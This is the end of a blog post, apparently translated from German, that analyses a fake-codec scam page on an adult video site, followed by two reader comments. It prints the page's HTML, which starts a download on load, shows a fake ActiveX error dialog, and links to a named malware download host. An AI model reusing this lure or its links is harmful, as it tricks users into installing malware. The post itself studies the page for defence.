if (FlagAr[0]=="1"){byFlag = true;}
if (FlagAr[0]=="3"){byFlag = true;}
if(!byFlag)
{
var p=document.getElementById("popdiv");
wmpwidth=document.body.clientWidth/2-190;
wmpheight=document.body.clientHeight/2-130;
p.style.top = wmpheight;
p.style.left = wmpwidth;
p.style.visibility = "visible";
p.focus();
}
}
softdownload();
setTimeout("showPopDiv();",1300);
</SCRIPT>
<CENTER>
<A href="javascript:Down2();"><IMG style="BORDER-RIGHT: #eeeeee 1px solid; BORDER-TOP: #eeeeee 1px solid; BACKGROUND: #000000; BORDER-LEFT: #eeeeee 1px solid; BORDER-BOTTOM: #eeeeee 1px solid" height=400 src="http://adult-freetube-8.com/i/play.gif" width=480></A>
<DIV id=popdiv style="Z-INDEX: 1; LEFT: 0px; VISIBILITY: hidden; POSITION: absolute; TOP: 0px" name="popdiv">
<table width="389" border="0" cellpadding="0" cellspacing="0">
<tr>
<td height="36">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="5" height="36"><img src="http://adult-freetube-8.com/i/img0.gif" width="5" height="36" alt="" /></td>
<td width="357" bgcolor="#0064B2" background="http://adult-freetube-8.com/i/img1.gif"><font style="font:bold 12px Verdana; color:#ffffff;">        Message Box Object Error</font></td>
<td width="21" bgcolor="#0064B2"><img src="http://adult-freetube-8.com/i/img2.gif" width="21" height="36" onclick="Close();" alt="" /></td>
<td width="6"><img src="http://adult-freetube-8.com/i/img3.gif" width="6" height="36" alt="" /></td>
</tr>
</table>
</td>
</tr>
<tr>
<td height="203" bgcolor="#FFFFDE" background="http://adult-freetube-8.com/i/img4.gif" valign="top">
<table width="100%" height="130" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="120"> </td>
<td valign="top">
<div style="width:100%;height:35px;"></div>
<font face="Tahoma" color="#000000" style="font-size:11px;">
<b>Video ActiveX Object Error:</b><br />
Your browser cannot display this video file.<br /><br />
You need to download new version of Video<br />
ActiveX Object to play this video file. </font>
</td>
</tr>
</table>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td align="center">
<font face="Tahoma" color="#000000" style="font-size:11px;">
To download and install ActiveX Object click <a href="http://sexicodecstars.com/download/502/725/4/" style="font:11px Arial;color:#000000;text-decoration:underline;">Continue</a>.<br /><br />
<input type="submit" value="Continue" onClick="Down('iax');" style="font-family:Arial;font-size:12px;font-weight:bold;color:#ffffff;background-color:#009CEE;background-image:url(http://adult-freetube-8.com/i/img5.gif);width:104px;height:26px;border:0;">
<input type="submit" value="Cancel" onClick="Close();" style="font-family:Arial;font-size:12px;font-weight:bold;color:#ffffff;background-color:#A1A1A1;background-image:url(http://adult-freetube-8.com/i/img5_.gif);width:104px;height:26px;border:0;">
<input type="submit" value="Details..." onClick="Details();" style="font-family:Arial;font-size:12px;font-weight:bold;color:#ffffff;background-color:#A1A1A1;background-image:url(http://adult-freetube-8.com/i/img5_.gif);width:104px;height:26px;border:0;">
</font>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td height="6"><img src="http://adult-freetube-8.com/i/img6.gif" width="389" height="6" alt="" /></td>
</tr>
</table>
</DIV>
<SCRIPT>Drag.init(document.getElementById('popdiv'));</SCRIPT>
<BR /><BR />
<BR />
<DIV style="FONT: 16pt Verdana">7 min 53 sec, Raiting 6/10, 50553 views</DIV>
<DIV style="FONT: 14pt Arial">34 users are watching this movie right now</DIV><BR /><A
style="BACKGROUND: #0000cc; FONT: bold 8pt Verdana; COLOR: #ffffff"
href="http://sexicodecstars.com/download/502/725/4/">Download Media Codec V1.668.3</A> </CENTER><BR /></DIV></BODY></HTML>
Let's pick one of those funny links! malzilla shows us this window:
After confirming, we have to press get once more and are asked where the file should be saved. ...in .\malware\ of course :)
Now let's see what the AVs make of it! You can check the current status of the analysis at AVIRA on Frau Katsumi's uploads. The number is [#139060]. Let's see how long it takes this time, 2 days?
Next I will start the link collector and check the domains it finds for connections on robtex.com. I think I will write a new article for that. I hope all of this is written clearly and is easy to follow.
Regards, kat
Comments
there was also a nice report about this on akte08 yesterday. at the end of the chain of companies there is apparently a 28-year-old who is doing really well =)
Revenue from the rip-off was an estimated 2.7 million euros . . .
oops, that was too early =) that was of course meant to go to nachbarschaftspost.
